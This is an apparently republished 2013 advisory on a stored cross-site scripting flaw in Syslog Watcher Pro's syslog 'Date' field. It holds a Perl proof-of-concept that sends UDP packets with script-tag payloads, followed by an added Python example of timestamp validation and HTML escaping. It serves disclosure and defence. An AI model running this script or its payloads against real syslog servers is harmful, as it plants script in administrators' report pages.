Syslog Watcher Pro 2.8.0.812 - (Date Parameter) - Cross Site Scripting Vulnerabi
Source: demonalex(at)163(dot)com  Author: demonalex  Published: 2013-05-02

Title: Syslog Watcher Pro 'Date' Parameter Cross Site Scripting Vulnerability
Software : Syslog Watcher Pro

Software Version : v2.8.0.812(Jun 15, 2009)

Vendor: http://www.snmpsoft.com/

Vulnerability Published : 2013-04-27

Vulnerability Update Time :

Status :

Impact : Medium(CVSS2 Base : 6.4, AV:N/AC:L/Au:N/C:P/I:P/A:N)

Bug Description :
Syslog Watcher Pro is a Windows-based syslog server for corporate networks.
Syslog Watcher Pro collects, stores, parses, displays and explains syslog information to both new and professional network administrators.
Syslog Watcher Pro (v2.8.0.812) is vulnerable to XSS through the 'Date' parameter of the syslog protocol.

How to Attack :
STEP 1: Send a syslog packet containing XSS code in the 'Date' parameter to Syslog Watcher Pro.
STEP 2: Syslog Watcher Pro stores the XSS code in its database.
STEP 3: The XSS code is executed when the victim generates and views a report in Syslog Watcher Pro.

Proof Of Concept :
-----------------------------------------------------------
#!/usr/bin/perl
use strict;
use warnings;
use IO::Socket::INET;
$| = 1;

my $host = shift;
my $port = shift;

die "usage: $0 host port\n" unless defined($host) && defined($port);

# UDP socket to the syslog listener
my $con = IO::Socket::INET->new(PeerPort => $port,
        Proto    => 'udp',
        PeerAddr => $host) or die "socket: $@\n";

# Packet layout: <PRI>DATE HOSTNAME TAG[PID]: MSG
my $npriority = '<0>';
my $nhostname = "10.0.0.2";
my $npid = 'test[10]';
my $nmsg = "testing by demonalex";

# Test strings placed where the date field is expected
my $testcase1 = "<script>alert(\"XSS1\")</script>";
my $testcase2 = "<script>alert(/XSS2/)</script>";

# testcase1
my $header = $testcase1.' '.$nhostname.' '.$npid;
my $packet = $npriority.$header.': '.$nmsg;
$con->send($packet);

# testcase2
$header = $testcase2.' '.$nhostname.' '.$npid;
$packet = $npriority.$header.': '.$nmsg;
$con->send($packet);

$con->close;

print "Over!\n";

exit(0);
-----------------------------------------------------------
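
A defensive counterpart to STEP 2 and STEP 3, added here as an illustration; it is not part of the original advisory and is not Syslog Watcher Pro code. The function names `parse_syslog` and `render_row`, the record layout, the fallback priority and the sample datagrams are assumptions made for the example.

```python
import html
import re
from datetime import datetime

PRI_RE = re.compile(r"^<(\d{1,3})>")
# RFC 3164 TIMESTAMP: "Mmm dd hh:mm:ss", day space-padded, then one space.
TS_RE = re.compile(
    r"^(?:Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec) "
    r"(?: [1-9]|[12]\d|3[01]) (?:[01]\d|2[0-3]):[0-5]\d:[0-5]\d ")

def parse_syslog(datagram: bytes, received: datetime) -> dict:
    """Ingest side: accept the sender's date only if it is a real timestamp."""
    text = datagram.decode("utf-8", errors="replace")
    pri = PRI_RE.match(text)
    body = text[pri.end():] if pri else text
    ts = TS_RE.match(body)
    if ts:
        date, msg = ts.group(0).rstrip(), body[ts.end():]
    else:
        # Not a timestamp: store the receive time instead and keep the
        # untrusted bytes as message text, never as the date column.
        date = f"{received:%b} {received.day:2d} {received:%H:%M:%S}"
        msg = body
    # Assumed fallback: 13 (user.notice), the RFC 3164 default priority.
    value = int(pri.group(1)) if pri and int(pri.group(1)) <= 191 else 13
    return {"pri": value, "date": date, "date_valid": bool(ts), "msg": msg}

def render_row(rec: dict) -> str:
    """Report side: HTML-encode every stored field, including the date."""
    cells = (rec["date"], str(rec["pri"]), rec["msg"])
    return "<tr>" + "".join(f"<td>{html.escape(c)}</td>" for c in cells) + "</tr>"

# Constructed sample datagrams: one well-formed, one shaped like the PoC packet.
SAMPLES = [
    b"<34>Oct  3 22:14:15 10.0.0.2 test[10]: link up",
    b'<0><script>alert("XSS1")</script> 10.0.0.2 test[10]: testing by demonalex',
]

if __name__ == "__main__":
    now = datetime(2013, 4, 27, 9, 5, 7)  # constructed receive time
    for raw in SAMPLES:
        rec = parse_syslog(raw, now)
        print(rec["date_valid"], render_row(rec))
```

Either control alone breaks the chain in the steps above; applying both means a record written before the ingest check existed is still rendered inert in reports.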

Credits : This vulnerability was discovered by demonalex(at)163(dot)com
mail: demonalex(at)163(dot)com / ChaoYi.Huang@connect.polyu.hk
Independent Researcher
DBAPPSecurity Co.,Ltd./Hong Kong PolyU

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved